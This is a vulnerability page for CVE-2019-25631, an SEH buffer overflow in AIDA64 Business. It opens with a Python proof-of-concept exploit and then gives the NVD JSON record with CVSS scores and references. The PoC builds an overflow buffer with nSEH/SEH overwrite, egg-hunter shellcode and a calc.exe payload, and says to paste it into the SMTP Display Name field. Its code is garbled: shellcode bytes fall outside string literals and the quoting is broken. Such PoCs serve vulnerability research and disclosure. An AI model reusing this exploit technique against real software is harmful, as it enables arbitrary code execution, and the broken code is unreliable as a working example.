CVE-2019-25631

#!/usr/bin/python # -*- coding: utf-8 -*- """ PoC for CVE-2019-25631 - AIDA64 Business SEH Buffer Overflow This script generates a malicious payload to trigger the overflow. """ import struct def create_exploit_buffer(): # Offset to SEH handler (hypothetical value based on vulnerability analysis) offset = 4064 # POP POP RET instruction address (from a non-ASLR module like AIDA64.exe or system DLL) # This address is used to pivot execution flow to the shellcode seh_handler = struct.pack('<L', 0x10020215) # Short jump to skip the SEH handler address and land on the shellcode nseh = b"\xeb\x06\x90\x90" # Egg Hunter Shellcode (x86) # This code searches memory for the tag 'w00tw00t' and executes the code following it hunter = b"" \x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7 """ # Padding to align the buffer padding = b"\x90" * 20 # The actual payload (The Egg) # Tag 'w00tw00t' followed by calc.exe execution (for demonstration) egg_tag = b"w00tw00t" payload = b"" \x31\xc9\x51\x68\x63\x61\x6c\x63\x54\xb8\xc7\x93\xc2\x77\xff\xd0 """ # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python # Construct the final buffer buffer = b"A" * offset buffer += nseh buffer += seh_handler buffer += hunter buffer += padding buffer += egg_tag + payload return buffer if __name__ == "__main__": exploit = create_exploit_buffer() print(f"[+] Generated Exploit Buffer Length: {len(exploit)}") print("[+] Usage: Copy this buffer into the 'SMTP Display Name' field in AIDA64 settings.")

{"cve": {"id": "CVE-2019-25631", "sourceIdentifier": "[email protected]", "published": "2026-03-24T12:16:03.393", "lastModified": "2026-03-27T16:59:50.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AIDA64 Business 5.99.4900 contains a structured exception handling buffer overflow vulnerability that allows local attackers to execute arbitrary code by overwriting SEH pointers with malicious shellcode. Attackers can inject egg hunter shellcode through the SMTP display name field in preferences or report wizard functionality to trigger the overflow and execute code with application privileges."}, {"lang": "es", "value": "AIDA64 Business 5.99.4900 contiene una vulnerabilidad de desbordamiento de búfer de manejo de excepciones estructurado que permite a atacantes locales ejecutar código arbitrario sobrescribiendo punteros SEH con shellcode malicioso. Los atacantes pueden inyectar shellcode egg hunter a través del campo de nombre para mostrar de SMTP en las preferencias o la funcionalidad del asistente de informes para activar el desbordamiento y ejecutar código con privilegios de aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aida64:aida64:5.99.4900:*:*:*:business:*:*:*", "matchCriteriaId": "5960B148-8387-47D8-82B8-CE6F3EC25F1C"}]}]}], "references": [{"url": "https://www.aida64.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.aida64.com/downloads", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46639", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/aida64-business-seh-buffer-overflow-via-egghunter", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}